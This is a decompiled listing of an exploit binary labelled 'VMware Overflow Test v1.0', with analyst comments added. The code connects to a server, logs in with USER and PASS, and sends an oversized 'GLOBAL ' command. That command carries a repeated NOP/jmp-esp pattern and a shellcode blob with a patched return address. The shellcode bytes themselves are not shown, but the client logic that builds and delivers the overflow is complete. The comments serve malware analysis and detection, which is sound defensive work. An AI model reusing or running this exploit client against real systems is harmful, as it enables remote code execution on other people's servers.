// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security;
// Analyst notes (static reading of the decompiler output only; nothing here was executed).
//
// This is the global <Module> type of the sample. The ??_C@_... field names are
// MSVC-mangled string-literal symbols and every import below is marked
// MethodCodeType.Native, so the program was presumably C/C++ compiled to MSIL;
// the decompiler shows pointer arithmetic and block copies instead of the original source.
//
// What the visible code does: a command-line TCP client that logs in with
// USER/PASS lines (FTP-style) and then sends one oversized "GLOBAL " line
// carrying a repeated 8-byte pattern followed by the `shellcode` blob.
//
// Detection-relevant observables visible in this listing:
//   * host: the banner/usage literals decoded on the fields below, and the
//     static symbols Jmp_ESP, Jmp_ESP_XP_Eng and shellcode;
//   * network: one command line of several hundred bytes right after login,
//     whose argument starts with 36 repetitions of the same 8 bytes.
//     Length limits on control-channel commands flag this without needing
//     to match the payload bytes.
// The field names Jmp_ESP / Jmp_ESP_XP_Eng suggest hard-coded return addresses
// for one OS build (name-based inference, the values are not in this listing);
// that kind of payload depends on fixed module addresses and an executable stack.
internal class \u003CModule\u003E
{
  // Banner rule made of repeated "*=" pairs (the mangled name keeps only the first 32 characters).
  public static \u0024ArrayType\u00240x5efdd7df \u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040;
  // Title literal, decodes to "VMware Overflow Test v1.0 Writte" and is truncated there by the name mangling.
  public static \u0024ArrayType\u00240xf1cc4cbd \u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040;
  // Credit literal: "Fixed by agathos", a contact address in angle brackets, then a newline.
  public static \u0024ArrayType\u00240x0e6cb2b2 \u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040;
  // Usage literal, decodes to "Usage: vmware.exe <IP> <PORT> <u" and is truncated there; the
  // remaining three argument names are not recoverable from the symbol.
  public static \u0024ArrayType\u00240x3a9112db \u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040;
  // "connect error\n"
  public static \u0024ArrayType\u00240x5bb2c15a \u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040;
  // "%s" - format string used to echo each server reply.
  public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040;
  // "USER " command prefix.
  public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040;
  // "\r\n" line terminator appended to every command.
  public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040;
  // "PASS " command prefix.
  public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040;
  // "GLOBAL " - prefix of the third, oversized command.
  public static \u0024ArrayType\u00240xfec415c1 \u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040;
  // Four bytes 0x90 0x90 'X' 'h'; first half of the repeated 8-byte pattern.
  public static \u0024ArrayType\u00240x4b6a6b8c \u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040;
  // "Done!\n"
  public static \u0024ArrayType\u00240x795c090e \u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040;
  // Not referenced anywhere in this listing; contents are not shown.
  public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP_XP_Eng;
  // Payload blob; contents are not shown. main() patches bytes 133-136 and copies 141 bytes from it.
  public static \u0024ArrayType\u00240x24ec09a1 shellcode;
  // Second half of the repeated 8-byte pattern (4 bytes are copied from it); contents are not shown.
  public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP;

  // Prints the banner: rule, title, credit line, usage line, rule.
  public static unsafe void usage()
  {
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ());
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040, __arglist ());
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040, __arglist ());
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040, __arglist ());
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ());
  }

  // Entry point. Requires exactly five arguments (argc == 6); otherwise prints the banner and returns 0.
  // argv is indexed in 4-byte steps, so the image uses 32-bit pointers:
  //   argv+4 = argv[1] (address), argv+8 = argv[2] (port), argv+12 = argv[3] (USER value),
  //   argv+16 = argv[4] (PASS value), argv+20 = argv[5] (integer flag, see below).
  // Returns -1 if connect() fails and 1 after the three commands have been sent.
  //
  // Wire sequence, as built below:
  //   read banner -> "USER <argv[3]>\r\n" -> read -> "PASS <argv[4]>\r\n" -> read ->
  //   "GLOBAL " + 36 x 8-byte pattern (offsets 7..294) + 141-byte blob (offsets 295..435) + "\r\n".
  // The work buffer is 4096 bytes and is zeroed before each use.
  public static unsafe int main(int argc, sbyte** argv)
  {
    if (argc != 6)
    {
      \u003CModule\u003E.usage();
      return 0;
    }
    WSAData wsaData;
    // 514 == 0x0202, i.e. Winsock version 2.2 is requested.
    \u003CModule\u003E.WSAStartup((ushort) 514, &wsaData);
    // (2, 1, 6) == AF_INET, SOCK_STREAM, IPPROTO_TCP.
    uint num1 = \u003CModule\u003E.socket(2, 1, 6);
    sockaddr_in sockaddrIn;
    // ISSUE: cast to a reference type
    // ISSUE: explicit reference operation
    // Offset 0 of sockaddr_in: address family 2 (AF_INET).
    ^(short&) ref sockaddrIn = (short) 2;
    // ISSUE: cast to a reference type
    // ISSUE: explicit reference operation
    // Offset 2: port taken from argv[2], converted to network byte order.
    ^(short&) ((IntPtr) &sockaddrIn + 2) = (short) \u003CModule\u003E.htons((ushort) \u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 8)));
    // ISSUE: cast to a reference type
    // ISSUE: explicit reference operation
    // Offset 4: IPv4 address parsed from argv[1].
    ^(int&) ((IntPtr) &sockaddrIn + 4) = (int) \u003CModule\u003E.inet_addr((sbyte*) *(int*) ((IntPtr) argv + 4));
    // argv[5] selects between two branches, but both write the same four bytes
    // (0xC6 0x84 0xE6 0x77) to offsets 133-136 of the payload blob, so the flag
    // has no effect in this build.
    // NOTE(review): the four bytes look like one little-endian 32-bit value
    // embedded in the payload; what it refers to cannot be confirmed from this listing.
    if (\u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 20)) != 0)
    {
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58;
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124;
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26;
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119;
    }
    else
    {
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58;
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124;
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26;
      // ISSUE: cast to a reference type
      // ISSUE: explicit reference operation
      ^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119;
    }
    // 16 == sizeof(sockaddr_in). On failure the function returns without
    // calling closesocket() or WSACleanup().
    if (\u003CModule\u003E.connect(num1, (sockaddr*) &sockaddrIn, 16) == -1)
    {
      \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040, __arglist ());
      return -1;
    }
    // 4096-byte work buffer, reused for every receive and send below.
    \u0024ArrayType\u00240x8011bcc8 arrayType0x8011bcc8;
    // ISSUE: initblk instruction
    __memset(ref arrayType0x8011bcc8, 0, 4096);
    // Read up to 100 bytes of the server greeting and echo it with "%s".
    \u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
    // ISSUE: initblk instruction
    __memset(ref arrayType0x8011bcc8, 0, 4096);
    // ISSUE: cpblk instruction
    // Build "USER " + argv[3] + "\r\n". argv[3] is appended with strcat and no
    // length check against the 4096-byte buffer.
    __memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040, 6);
    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 12));
    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
    uint num2 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
    \u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num2, 0);
    // ISSUE: initblk instruction
    __memset(ref arrayType0x8011bcc8, 0, 4096);
    // Read and echo the reply to USER.
    \u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
    // ISSUE: initblk instruction
    __memset(ref arrayType0x8011bcc8, 0, 4096);
    // ISSUE: cpblk instruction
    // Build "PASS " + argv[4] + "\r\n", same unchecked strcat as above.
    __memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040, 6);
    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 16));
    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
    uint num3 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
    \u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num3, 0);
    // ISSUE: initblk instruction
    __memset(ref arrayType0x8011bcc8, 0, 4096);
    // Read and echo the reply to PASS.
    \u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
    // ISSUE: initblk instruction
    __memset(ref arrayType0x8011bcc8, 0, 4096);
    // ISSUE: cpblk instruction
    // Third command: "GLOBAL " (7 characters plus NUL) at offset 0.
    __memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040, 8);
    // Write cursor starts at buffer+11, so the first 4-byte write (cursor-4)
    // lands at offset 7, directly after "GLOBAL " and over its NUL.
    int num4 = (int) ((IntPtr) &arrayType0x8011bcc8 + 11);
    uint num5 = 36;
    // 36 iterations x 8 bytes: 4 bytes (0x90 0x90 'X' 'h') followed by the
    // 4 bytes of Jmp_ESP. Fills offsets 7..294 with one repeating pattern,
    // which is the fixed structure a length or content rule can key on.
    do
    {
      // ISSUE: cpblk instruction
      __memcpy(num4 - 4, ref \u003CModule\u003E.\u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040, 4);
      // ISSUE: cpblk instruction
      __memcpy(num4, ref \u003CModule\u003E.Jmp_ESP, 4);
      num4 += 8;
      --num5;
    }
    while (num5 > 0U);
    // ISSUE: cast to a reference type
    // ISSUE: cpblk instruction
    // 141 bytes of the payload blob at offset 295 (7 + 36 * 8), ending at offset 435.
    __memcpy((\u0024ArrayType\u00240x8011bcc8&) ((IntPtr) &arrayType0x8011bcc8 + 295), ref \u003CModule\u003E.shellcode, 141);
    // Terminator and length both depend on the first NUL in the buffer
    // (strcat/strlen), not on the known offsets above.
    \u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
    uint num6 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
    \u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num6, 0);
    // No reply is read after the third command; the client prints "Done!" and closes.
    \u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040, __arglist ());
    \u003CModule\u003E.closesocket(num1);
    \u003CModule\u003E.WSACleanup();
    return 1;
  }

  // Native imports. Each is declared extern with MethodCodeType.Native, i.e. the
  // body is unmanaged code rather than IL. The names match C runtime functions
  // (printf, strlen, strcat, atoi, _mainCRTStartup) and Winsock functions
  // (WSAStartup, WSACleanup, socket, connect, send, recv, closesocket,
  // inet_addr, htons). [SuppressUnmanagedCodeSecurity] skips the runtime's
  // unmanaged-code permission stack walk on these calls. Parameter names
  // (obj0, obj1, ...) are decompiler placeholders.

  // C runtime printf (varargs via __arglist).
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int printf([In] sbyte* obj0, __arglist);

  // Winsock teardown.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern int WSACleanup();

  // Closes the socket handle.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern int closesocket([In] uint obj0);

  // send(socket, buffer, length, flags).
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int send([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3);

  // C runtime strlen; main() uses it to decide how many bytes to send.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe uint strlen([In] sbyte* obj0);

  // C runtime strcat (unbounded append).
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe sbyte* strcat([In] sbyte* obj0, [In] sbyte* obj1);

  // recv(socket, buffer, length, flags).
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int recv([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3);

  // connect(socket, address, address length).
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int connect([In] uint obj0, [In] sockaddr* obj1, [In] int obj2);

  // Parses a dotted IPv4 string into a 32-bit address.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe uint inet_addr([In] sbyte* obj0);

  // C runtime atoi; used for the port (argv[2]) and the flag (argv[5]).
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int atoi([In] sbyte* obj0);

  // Host-to-network byte order for a 16-bit value.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern ushort htons([In] ushort obj0);

  // socket(family, type, protocol).
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern uint socket([In] int obj0, [In] int obj1, [In] int obj2);

  // Winsock initialisation.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int WSAStartup([In] ushort obj0, [In] WSAData* obj1);

  // Native C runtime startup routine; not called from the managed code shown here.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern uint _mainCRTStartup();
}